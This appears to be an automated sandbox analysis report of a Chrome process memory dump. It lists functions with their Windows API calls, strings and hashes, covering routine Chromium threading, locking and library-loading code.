Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID:
String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__string\char_traits.h:223: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$/prefetch:7$SetUnhandledExceptionFilter$database$kernel32.dll
API String ID: 0-1004627178
Opcode ID: 4a24a18d1686d049984ec6cbfeb6f3f31f8d95092c89649b73734b787c6ede6d
Instruction ID: 4b3adfa9322280bdec8f9716d5811b87906d89e9bccb62c46f895e2b22a4ea2a
Opcode Fuzzy Hash: 4a24a18d1686d049984ec6cbfeb6f3f31f8d95092c89649b73734b787c6ede6d
Instruction Fuzzy Hash: AEC16A22E0DB9285EA20FB10E9503B977A1FB95F84F419135DA8D836A5EF7CED85C700

Function 00007FF645782480 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 176threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6457824DF
GetCurrentThreadId.KERNEL32 ref: 00007FF645782504
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF645782559
PostQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6457825A4

Strings

Chrome.MessageLoopProblem.COMPLETION_POST_ERROR, xrefs: 00007FF645782632
WaitableEvent::Signal, xrefs: 00007FF645782743
ScheduleWork, xrefs: 00007FF6457826D0
Chrome.MessageLoopProblem.MESSAGE_POST_ERROR, xrefs: 00007FF645782626
ScheduleWorkToSelf, xrefs: 00007FF64578270A
I, xrefs: 00007FF645782655

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: CurrentThread$CompletionEventPostQueuedStatus
String ID: Chrome.MessageLoopProblem.COMPLETION_POST_ERROR$Chrome.MessageLoopProblem.MESSAGE_POST_ERROR$I$ScheduleWork$ScheduleWorkToSelf$WaitableEvent::Signal
API String ID: 3823919964-1721350857
Opcode ID: b5df5b6d8f4de5b14f0895cb04891ef43754d68fdaa75452e19127bb265213a1
Instruction ID: 5b82bc7f65eba7844c1dfa7f4e54712d4776081793dfbcd430678aa93160fe0c
Opcode Fuzzy Hash: b5df5b6d8f4de5b14f0895cb04891ef43754d68fdaa75452e19127bb265213a1
Instruction Fuzzy Hash: 5D81C122A0CA5286FA21BB15E4603BE77A1EB45F85F504032DB8D877A5DF3CED4AC705

Function 00007FF6456CAD20 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6456CAD64
SetLastError.KERNEL32 ref: 00007FF6456CAD90
GetLastError.KERNEL32 ref: 00007FF6456CADA0
SetLastError.KERNEL32 ref: 00007FF6456CADCA
GetModuleHandleW.KERNEL32 ref: 00007FF6456CAE55
GetProcAddress.KERNEL32 ref: 00007FF6456CAE65
GetModuleHandleW.KERNEL32 ref: 00007FF6456CAE9A
GetProcAddress.KERNEL32 ref: 00007FF6456CAEAA

Strings

GetHandleVerifier, xrefs: 00007FF6456CAE5B, 00007FF6456CAEA0

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ErrorLast$AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1762409328-1090674830
Opcode ID: 8e9dfe6d9e4e1bf7b4335dc2c1cbf4409eec5ca241d353230f364f13ce35fcf3
Instruction ID: 1a0ebbdae3f6d79b03c538710a81f71566f4897750f51a0bbc60d477cc1962cc
Opcode Fuzzy Hash: 8e9dfe6d9e4e1bf7b4335dc2c1cbf4409eec5ca241d353230f364f13ce35fcf3
Instruction Fuzzy Hash: 1751F531A0DA1287EE26BB25E45437963A1EB49F50F808436CA4EC27B0DF7CEC85E340

Function 00007FF6456CA8D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6456CA90C
GetCurrentProcess.KERNEL32 ref: 00007FF6456CA912
DuplicateHandle.KERNEL32 ref: 00007FF6456CA933
GetLastError.KERNEL32 ref: 00007FF6456CA94E
SetLastError.KERNEL32 ref: 00007FF6456CA976
GetModuleHandleW.KERNEL32 ref: 00007FF6456CA9CA
GetProcAddress.KERNEL32 ref: 00007FF6456CA9DA
GetLastError.KERNEL32 ref: 00007FF6456CAA10

Strings

GetHandleVerifier, xrefs: 00007FF6456CA9D0

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ErrorLast$CurrentHandleProcess$AddressDuplicateModuleProc
String ID: GetHandleVerifier
API String ID: 2392487275-1090674830
Opcode ID: 7b506e1c3b312edd385a00258bcf5ab7043c291c3ba138b61364e127a71d91c6
Instruction ID: c93a2a520141dac9f3dccab5ece4c5e971907065087248835d7384537874ca72
Opcode Fuzzy Hash: 7b506e1c3b312edd385a00258bcf5ab7043c291c3ba138b61364e127a71d91c6
Instruction Fuzzy Hash: 12317931A1DA4286EE16BB61B84537D63A1BF85F90F458436DA8EC77B0DF3CEC45A200

Function 00007FF645695290 Relevance: 15.2, APIs: 10, Instructions: 169COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,00007FF64568BA1F), ref: 00007FF6456952C5
WakeAllConditionVariable.KERNEL32(?,00007FF64568BA1F), ref: 00007FF6456952D7
ReleaseSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF6456952E0
TryAcquireSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF6456952E9
ReleaseSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF645695317
TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,00007FF64568BA1F), ref: 00007FF64569536C
ReleaseSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF645695386
AcquireSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF645695394
AcquireSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF6456953A2
AcquireSRWLockExclusive.KERNEL32(?,00007FF64568BA1F), ref: 00007FF645695445

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release$ConditionVariableWake
String ID:
API String ID: 2824607059-0
Opcode ID: 602040b810bb270ab2a755297320465e3e6b28db7b1482a9b188cb5049921afe
Instruction ID: d8decf05a09ed0b0147595eb6ab90e940f8ad49344c8ee26164d65dc34595314
Opcode Fuzzy Hash: 602040b810bb270ab2a755297320465e3e6b28db7b1482a9b188cb5049921afe
Instruction Fuzzy Hash: 7451B061A1DA12C6EE95FF16E8142792B62BF65F86F444531DD0E872B0DE3DEC86D300

Function 00007FF6456908F0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 341COMMON

Download Yara Rule

Strings

%08x-%04x-%04x-%04x-%012llx, xrefs: 00007FF645690C69
..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00007FF645690A12
CreateAndOpenTemporaryFileInDir, xrefs: 00007FF645690A7E
ScopedBlockingCall, xrefs: 00007FF645690ED7
..\..\base\files\file_util_win.cc, xrefs: 00007FF645690A85

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID:
String ID: %08x-%04x-%04x-%04x-%012llx$..\..\base\files\file_util_win.cc$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$CreateAndOpenTemporaryFileInDir$ScopedBlockingCall
API String ID: 0-577886094
Opcode ID: 437cb866f2b00d5b7e7248605aac4ee1b59d5bea11a6b44c4d471a0841ba12c9
Instruction ID: a8decc81173dd95217a81f0dc6de1d63d95fc5f45a900955aa61ef3ef16bb3f4
Opcode Fuzzy Hash: 437cb866f2b00d5b7e7248605aac4ee1b59d5bea11a6b44c4d471a0841ba12c9
Instruction Fuzzy Hash: AFE18132A0DA82C5EA31BB15E4403BA77A0FF85BA4F044131DA9D87BA5DF3DE995D700

Function 00007FF645681960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 112COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 00007FF645681A52
ReleaseSRWLockExclusive.KERNEL32(?,?,?), ref: 00007FF645681A8B
AcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 00007FF645681AD6

Strings

WaitNoSyncWork, xrefs: 00007FF6456819D7
ScopedAllowBaseSyncPrimitivesOutsideBlockingScope, xrefs: 00007FF645681AEF, 00007FF645681B3C
E, xrefs: 00007FF645681B5F
..\..\base\task\sequence_manager\work_tracker.cc, xrefs: 00007FF6456819DE

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: ..\..\base\task\sequence_manager\work_tracker.cc$E$ScopedAllowBaseSyncPrimitivesOutsideBlockingScope$WaitNoSyncWork
API String ID: 1678258262-2415033031
Opcode ID: 6f002bc012eb3f2abc82f64895baaa89af231c2530ca4ab2b515b2ef2fc004b4
Instruction ID: ea368b461330faa723b1b8872d07c169745e0098af83490f126c200e4a50179f
Opcode Fuzzy Hash: 6f002bc012eb3f2abc82f64895baaa89af231c2530ca4ab2b515b2ef2fc004b4
Instruction Fuzzy Hash: 9B51A03160DB8686EA20FB15E4503BA73A0FB85F94F544132DA9D877A5DF3DE84ACB01

Function 00007FF64569E880 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF64569E91A
CloseHandle.KERNEL32(?,?,?,?,-7FFFFFFFFFFFFFFF,00007FFE2167ADA0,?,000003E8,00007FFE21675C10,?,?,?,00007FF645803147), ref: 00007FF64569E959
GetLastError.KERNEL32(?,?,?,?,-7FFFFFFFFFFFFFFF,00007FFE2167ADA0,?,000003E8,00007FFE21675C10,?,?,?,00007FF645803147), ref: 00007FF64569E961

Strings

create_thread_last_error, xrefs: 00007FF64569EA7D
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF64569EA58
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF64569EA45

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: CloseCreateErrorHandleLastThread
String ID: ..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$create_thread_last_error
API String ID: 747004058-2499615631
Opcode ID: 4edb9982dfc1ff16ac9b0981a3e541cb33d27d15361071aae8737b8a37ec8200
Instruction ID: a9887ada0fa991da90ef746d35d66414c4524399a8a7a036606cf70a81594ff1
Opcode Fuzzy Hash: 4edb9982dfc1ff16ac9b0981a3e541cb33d27d15361071aae8737b8a37ec8200
Instruction Fuzzy Hash: 18518831A0DA5396FEA1BB15A8502BA77A0AF44F90F484131E98EC67A5DF3CEC46D701

Function 00007FF645690330 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF645690390
LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF64569028D), ref: 00007FF6456903D7
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF64569028D), ref: 00007FF645690420
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF64569028D), ref: 00007FF645690430

Strings

Kernel32.dll, xrefs: 00007FF645690419
GetThreadDescription, xrefs: 00007FF645690426

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressCurrentFreeHandleLocalModuleProcThread
String ID: GetThreadDescription$Kernel32.dll
API String ID: 4205643583-415897907
Opcode ID: 18df0e3b521a01ac664039f2d608853dc77d84bcd1a636cef82c2e8f479e94df
Instruction ID: 7f774a6f97e7aee3de1e8cc377069b0c8df822f8f6121bba0380a68a05c8787a
Opcode Fuzzy Hash: 18df0e3b521a01ac664039f2d608853dc77d84bcd1a636cef82c2e8f479e94df
Instruction Fuzzy Hash: CE312D31A0C652CAEA11FB15E99427A33A1AF84FE4F500231DA4DC77A9DF2CEC959700

Function 00007FF645732AD0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 278COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF645732B9B
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF645732CA4
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF645732CF9
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF645732D0F

Strings

first, xrefs: 00007FF645732E44, 00007FF645732E75, 00007FF645732EA9

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: first
API String ID: 17069307-2456940119
Opcode ID: fb0c75a7b5f419db29a0c27ebce577e03f2cb546b9f9863034d50c30d56048da
Instruction ID: d104c598603a7581c81ea65fffbe56b7df267fd4c26477940a9ff6e76b4db515
Opcode Fuzzy Hash: fb0c75a7b5f419db29a0c27ebce577e03f2cb546b9f9863034d50c30d56048da
Instruction Fuzzy Hash: 0AB10122A1C69286EA59BF2594052BE27A0FF55F94F188031DF4D87BA4EF3CE952C344

Function 00007FF6456811F0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 257threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF645681215
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF64568102C), ref: 00007FF645681220
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF64568102C), ref: 00007FF6456813B3
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF64568102C), ref: 00007FF64568158A

Strings

..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF64568159C

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$CurrentReleaseThread
String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
API String ID: 1385397084-2888085009
Opcode ID: fe84cfcab056a2d9951742981c424e767ffcb1a7fe9b9e2656dcfbe40596f73b
Instruction ID: 3bc4e8319e179653aa265049aac905b961b022cbd3e32a21a8305ad2b967b7bf
Opcode Fuzzy Hash: fe84cfcab056a2d9951742981c424e767ffcb1a7fe9b9e2656dcfbe40596f73b
Instruction Fuzzy Hash: C8B19462A0EB5282EA20FB12D45427D67A0FB4AFD4F454236DE4E877A1DF3CE980D701

Function 00007FF64574FC80 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 177libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FF64574FEB7
GetProcAddress.KERNEL32 ref: 00007FF64574FECC

Strings

..\..\third_party\libc++\src\include\__string\char_traits.h:368: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF64574FE41
ProcessPrng, xrefs: 00007FF64574FEC2
bcryptprimitives.dll, xrefs: 00007FF64574FEB0

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
